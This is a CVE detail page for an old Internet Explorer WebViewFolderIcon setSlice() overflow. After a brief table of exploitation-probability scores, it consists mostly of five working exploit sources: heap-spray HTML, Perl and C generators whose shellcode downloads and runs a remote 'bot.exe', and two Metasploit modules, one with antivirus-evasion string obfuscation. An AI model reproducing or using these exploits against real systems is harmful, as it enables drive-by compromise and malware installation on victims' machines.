CVE-2006-3730 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	84.29%	–	–
2022-09-25	–	–	87.63%	–	–
2023-03-12	–	–	–	97%	–
2023-04-16	–	–	–	97.29%	–
2023-05-28	–	–	–	97.33%	–
2023-07-02	–	–	–	97.29%	–
2023-08-13	–	–	–	97.22%	–
2023-09-17	–	–	–	97.02%	–
2023-10-29	–	–	–	97.15%	–
2023-12-17	–	–	–	97.2%	–
2024-02-04	–	–	–	97.29%	–
2024-03-24	–	–	–	97.22%	–
2024-06-02	–	–	–	97.22%	–
2024-06-09	–	–	–	97.29%	–
2024-11-10	–	–	–	97.34%	–
2024-12-22	–	–	–	97.41%	–
2025-01-19	–	–	–	97.41%	–
2025-03-18	–	–	–	–	88.31%
2025-03-18	–	–	–	–	88.31,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2022-09-25	1%
2023-03-12	1%
2023-04-16	1%
2023-05-28	1%
2023-07-02	1%
2023-08-13	1%
2023-09-17	1%
2023-10-29	1%
2023-12-17	1%
2024-02-04	1%
2024-03-24	1%
2024-06-02	1%
2024-06-09	1%
2024-11-10	1%
2024-12-22	1%
2025-01-19	1%
2025-03-18	99%
2025-03-18	99%

#!/usr/bin/perl # # Microsoft Internet Explorer WebViewFolderIcon setSlice() D0wnLoad & Exec POC # # Author: Vampyroteuthis Infernalis <skyhole [at] gmail.com> # Greetz: H D Moor, Dark Eagle, Jamikazu # # use strict; my $sco = "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03". "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74". "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E". "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03". "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C". "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40". "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C". "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC". "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F". "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB". "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83". "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF". "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF". "http://dedicated.com/bot.exe"; my $war_code= convert_sco($sco); my @exploit_body=<<FOOKER; <HTML> <BODY> <SCRIPT language="javascript"> var heapSprayToAddress = 0x05050505; var infernalis_ = unescape("%u9090%u9090$war_code"); var heapBlockSize = 0x400000; var payLoadSize = infernalis_.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u0505%u0505"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory[i] = spraySlide + infernalis_; } for ( i = 0 ; i < 128 ; i++) { try{ var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1'); tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 ); }catch(e){} } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } </SCRIPT> </BODY> </HTML> FOOKER open (IE_VML, ">", "exploit.html"); print IE_VML @exploit_body; close IE_VML; sub convert_sco { my $data = shift; my $mode = shift() || 'LE'; my $code = ''; my $idx = 0; if (length($data) % 2 != 0) { $data .= substr($data, -1, 1); } while ($idx < length($data) - 1) { my $c1 = ord(substr($data, $idx, 1)); my $c2 = ord(substr($data, $idx+1, 1)); if ($mode eq 'LE') { $code .= sprintf('%%u%.2x%.2x', $c2, $c1); } else { $code .= sprintf('%%u%.2x%.2x', $c1, $c2); } $idx += 2; } return $code; } # milw0rm.com [2006-09-29]

/* *----------------------------------------------------------------------- * * Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day) * Works on all Windows XP versions including SP2 * * Author: LukeHack * Mail: lukehack@fastwebnet.it * * Bug discovered by Computer H D Moore (http://www.metasploit.com) * * Credit: metasploit, jamikazu, yag kohna(for the shellcode) * * : * Tested : * : Windows XP SP2 + Internet Explorer 6.0 SP1 * : * Complie : cl pociewvf.c * : * Usage : c:\>pociewvf * : * :Usage: pociewvf <exe_URL> [htmlfile] * : * * *------------------------------------------------------------------------ */ #include <stdio.h> #include <stdlib.h> #include <string.h> FILE *fp = NULL; char *file = "lukehack.htm"; char *url = NULL; unsigned char sc[] = "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"; char * header = "<html>\n" "<body>\n" "<script>\n" "\tvar heapSprayToAddress = 0x05050505;\n" "\tvar shellcode = unescape(\"%u9090\"+\"%u9090\"+ \n"; char * footer = "var heapBlockSize = 0x400000;\n" "var payLoadSize = shellcode.length * 2;\n" "var spraySlideSize = heapBlockSize - (payLoadSize+0x38);\n" "var spraySlide = unescape(\"%u0505%u0505\");\n" "spraySlide = getSpraySlide(spraySlide,spraySlideSize);\n" "heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\n" "memory = new Array();\n\n" "for (i=0;i<heapBlocks;i++)\n{\n" "\t\tmemory[i] = spraySlide + shellcode;\n}\n" "for ( i = 0 ; i < 128 ; i++)\n{\n\t" "try\n\t{\n\t\tvar tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');\n" "\t\ttar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );\n" "\t}\n\tcatch(e){}\n}\n\n" "function getSpraySlide(spraySlide, spraySlideSize)\n{\n\t" "while (spraySlide.length*2<spraySlideSize)\n\t" "{\n\t\tspraySlide += spraySlide;\n\t}\n" "\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\n\treturn spraySlide;\n}\n\n" "</script>\n" "</body>\n" "</html>\n"; // print unicode shellcode void PrintPayLoad(char *lpBuff, int buffsize) { int i; for(i=0;i<buffsize;i+=2) { if((i%16)==0) { if(i!=0) { printf("\"\n\""); fprintf(fp, "%s", "\" +\n\""); } else { printf("\""); fprintf(fp, "%s", "\""); } } printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]); fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]); } printf("\";\n"); fprintf(fp, "%s", "\");\n"); fflush(fp); } void main(int argc, char **argv) { unsigned char buf[1024] = {0}; int sc_len = 0; if (argc < 2) { printf("Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)\n"); printf("Code by LukeHack\n"); printf("\r\nUsage: %s <URL> [htmlfile]\r\n\n", argv[0]); exit(1); } url = argv[1]; if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) { printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); return; } printf("[+] download url:%s\n", url); if(argc >=3) file = argv[2]; printf("[+] exploit file:%s\n", file); fp = fopen(file, "w"); if(!fp) { printf("[-] Open file error!\n"); return; } fprintf(fp, "%s", header); fflush(fp); memset(buf, 0, sizeof(buf)); sc_len = sizeof(sc)-1; memcpy(buf, sc, sc_len); memcpy(buf+sc_len, url, strlen(url)); sc_len += strlen(url)+1; PrintPayLoad(buf, sc_len); fprintf(fp, "%s", footer); fflush(fp); printf("[+] exploit write to %s success!\n", file); } // LukeHack coded it! // milw0rm.com [2006-09-29]

<!-- ..::[ jamikazu presents ]::.. Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day) Works on all Windows XP versions including SP2 Author: jamikazu Mail: jamikazu@gmail.com Bug discovered by Computer H D Moore (http://www.metasploit.com) Credit: metasploit, SkyLined invokes calc.exe if successful --> <HTML> <BODY> <SCRIPT language="javascript"> var heapSprayToAddress = 0x05050505; var payLoadCode = unescape( "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" + "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" + "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" + "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" + "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" + "%uFF57%u63E7%u6C61%u0063"); var heapBlockSize = 0x400000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u0505%u0505"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory[i] = spraySlide + payLoadCode; } for ( i = 0 ; i < 128 ; i++) { try{ var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1'); tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 ); }catch(e){} } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } </SCRIPT> </BODY> </HTML> # milw0rm.com [2006-09-28]

# This module is part of the metasploit framework3 # svn co http://metasploit.com/svn/framework3/trunk/ require 'msf/core' module Msf class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote include Exploit::Remote::HttpServer::Html def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow', 'Description' => %q{ This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18). }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', ], 'Version' => '$Revision: 3783 $', 'References' => [ [ 'OSVDB', '27110' ], [ 'BID', '19030' ], [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ] ], 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ] ], 'DefaultTarget' => 0)) end def autofilter false end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Get a unicode friendly version of the return address addr_word = [target.ret].pack('V').unpack('H*')[0][0,4] # Randomize the javascript variable names var_buffer = Rex::Text.rand_text_alpha(rand(30)+2) var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2) var_unescape = Rex::Text.rand_text_alpha(rand(30)+2) var_x = Rex::Text.rand_text_alpha(rand(30)+2) var_i = Rex::Text.rand_text_alpha(rand(30)+2) var_tic = Rex::Text.rand_text_alpha(rand(30)+2) var_toc = Rex::Text.rand_text_alpha(rand(30)+2) # Randomize HTML data html = Rex::Text.rand_text_alpha(rand(30)+2) # Build out the message content = %Q| <html> <head> <script> try { var #{var_unescape} = unescape ; var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ; var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ; while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ; var #{var_x} = new Array() ; for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) { #{var_x}[ #{var_i} ] = #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ; } for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) { var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' ); try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { } var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' ); } } catch( e ) { window.location = 'about:blank' ; } </script> </head> <body> #{html} </body> </html> | # Randomize the whitespace in the document content.gsub!(/\s+/) do |s| len = rand(100)+2 set = "\x09\x20\x0d\x0a" buf = '' while (buf.length < len) buf << set[rand(set.length)].chr end buf end print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response(cli, content) end end end # milw0rm.com [2006-09-27]

## # $Id: ms06_057_webview_setslice.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow', 'Description' => %q{ This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18). }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', ], 'Version' => '$Revision: 9669 $', 'References' => [ [ 'CVE', '2006-3730'], [ 'OSVDB', '27110' ], [ 'MSB', 'MS06-057'], [ 'BID', '19030' ], [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ] ], 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 17 2006')) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Get a unicode friendly version of the return address addr_word = [target.ret].pack('V').unpack('H*')[0][0,4] # Randomize the javascript variable names var_buffer = rand_text_alpha(rand(30)+2) var_shellcode = rand_text_alpha(rand(30)+2) var_unescape = rand_text_alpha(rand(30)+2) var_x = rand_text_alpha(rand(30)+2) var_i = rand_text_alpha(rand(30)+2) var_tic = rand_text_alpha(rand(30)+2) var_toc = rand_text_alpha(rand(30)+2) # Annoying AVs var_aname = "==QMu42bjlkclRGbvZ0dllmViV2Vu42bjlkclRGbvZ0dllmViV2V".reverse.unpack("m*")[0] var_ameth = "=U2Ypx2U0V2c".reverse.unpack("m*")[0] # Randomize HTML data html = rand_text_alpha(rand(30)+2) # Build out the message content = %Q| <html> <head> <script> try { var #{var_unescape} = unescape ; var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ; var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ; while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ; var #{var_x} = new Array() ; for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) { #{var_x}[ #{var_i} ] = #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ; } for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) { var #{var_tic} = new ActiveXObject( '#{var_aname}' ); try { #{var_tic}.#{var_ameth}( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { } var #{var_toc} = new ActiveXObject( '#{var_aname}' ); } } catch( e ) { window.location = 'about:blank' ; } </script> </head> <body> #{html} </body> </html> | content = Rex::Text.randomize_space(content) print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end